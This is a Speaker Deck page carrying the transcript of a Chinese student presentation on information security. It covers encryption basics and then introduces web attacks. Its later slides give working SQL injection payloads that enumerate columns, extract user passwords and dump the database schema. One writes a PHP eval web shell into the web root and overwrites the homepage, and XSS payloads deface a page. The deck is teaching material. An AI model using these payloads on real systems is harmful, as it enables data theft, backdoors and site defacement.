Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Information Security
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
Bleu Ren
February 24, 2014
Technology
0
60
Information Security
AIS presentation
[email protected]
Bleu Ren
February 24, 2014
Tweet
Share
More Decks by Bleu Ren
See All by Bleu Ren
Introduction to Convolutional Neural Networks
bleu
0
96
Recently doing-20161110
bleu
0
53
Industry 5.0
bleu
0
260
Big Data
bleu
0
78
Database Management Concepts
bleu
0
79
Bleu Framework for Hbase & Hadoop
bleu
0
91
Paper discuss : Hadoop & HBase
bleu
1
73
Visualizing social network concepts
bleu
0
92
Determinants of RFID adoption intention: Evidence from Taiwanese retail chains
bleu
0
79
Other Decks in Technology
See All in Technology
みんなだいすきALB、NLBの 仕組みから最新機能まで総おさらい / Mastering ALB & NLB: Internal Mechanics and Latest Innovations
kaminashi
0
160
書籍執筆での生成AIの活用
sat
PRO
1
240
AI開発の落とし穴 〜馬には乗ってみよAIには添うてみよ〜
sansantech
PRO
10
5.6k
3分でわかる!新機能 AWS Transform custom
sato4mi
1
280
DatabricksホストモデルでAIコーディング環境を構築する
databricksjapan
0
210
【5分でわかる】セーフィー エンジニア向け会社紹介
safie_recruit
0
41k
いよいよ仕事を奪われそうな波が来たぜ
kazzpapa3
3
310
Amazon Bedrock AgentCore 認証・認可入門
hironobuiga
2
470
AIとともに歩む情報セキュリティ / Information Security with AI
kanny
4
2.9k
Embedded SREの終わりを設計する 「なんとなく」から計画的な自立支援へ
sansantech
PRO
2
900
システムのアラート調査をサポートするAI Agentの紹介/Introduction to an AI Agent for System Alert Investigation
taddy_919
2
1.2k
月間数億レコードのアクセスログ基盤を無停止・低コストでAWS移行せよ!アプリケーションエンジニアのSREチャレンジ💪
miyamu
0
550
Featured
See All Featured
jQuery: Nuts, Bolts and Bling
dougneiner
65
8.4k
How to Grow Your eCommerce with AI & Automation
katarinadahlin
PRO
0
100
DevOps and Value Stream Thinking: Enabling flow, efficiency and business value
helenjbeal
1
88
How to build an LLM SEO readiness audit: a practical framework
nmsamuel
1
630
Build The Right Thing And Hit Your Dates
maggiecrowley
38
3k
Building an army of robots
kneath
306
46k
Principles of Awesome APIs and How to Build Them.
keavy
128
17k
No one is an island. Learnings from fostering a developers community.
thoeni
21
3.6k
Impact Scores and Hybrid Strategies: The future of link building
tamaranovitovic
0
190
For a Future-Friendly Web
brad_frost
182
10k
Imperfection Machines: The Place of Print at Facebook
scottboms
269
14k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
31
3.1k
Transcript
會計資訊系統簡報 - 資訊安全 簡報製作 : 四資管四甲 任家輝 指導教授 : 杜佩樺
隱密性 如何確保只有寄件者及收件者可以 讀取資料
可認證性 如何知道資料是來自原寄件者
完整性 如何知道資料沒有被更改過
不可抵賴性 防止資料傳輸/接收發生後對行為 的否認。
秘密金鑰加密法(對稱性加密)
公開金鑰加密法(非對稱性加密) • 收件者保留私密金鑰,並將公開金鑰公諸 於世,送件者依照公開金鑰將訊息加密, 收件者在使用私密金鑰進行解密
公開金鑰加密法(非對稱性加密)
可逆加密與不可逆加密
安全認證中心CA
延伸內容 – 從駭客面談資安 了解駭客思維,才能應付千方百計 的駭客
CSRF
None
SQLi
None
查詢注入欄位 • 注入時,可能會先使用 UNION 找出可以插 入的地方爲何,例如: • http://localhost/news/?mod=news&act =show&id=-1 union
select 1,2,3,4,5,6,7
• 可以看出 3, 4, 7 的地方可以插入我們想要獲取的資 料, 假如我們想要知道當前使用者為何,可以將 7 的地
方改成 user() 如: • http://localhost/news/?mod=news&act=show& id=-1 union select 1,2,3,4,5,6,user()
None
• 若是要取得某欄位的資訊的話(以使 用者密碼為例),則是注入-1 union select 1,2,3,4,5,6,password from user limit 0,1
• 使用(SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE
@ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name,column_name) )) ) )x)將整個資料庫dump出來
寫後門改首頁 • ?MOD=NEWS&ACT=SHOW&ID=1 INTO OUTFILE '../../../../apache24/htdoc s/.a.php' LINES TERMINATED BY
'<?php eval($_GET[cmd];)?>' • 透過outfile的方式建立後門檔案到網站目 錄中
再透過fwrite的方式更改首頁。 • /.a.php?cmd=$fp = fopen('index.php', 'w');fwrite($fp, "Hack by 49941131");fclose($fp);
None
或是直接以最高權限執行 server command
XSS
使用訊息框進行XSS attack • <script>alert(‘hello’)</script>
利用XSS改首頁 <script>window.onload = function(){document.write('hacked by 49941131')}</script>
謝謝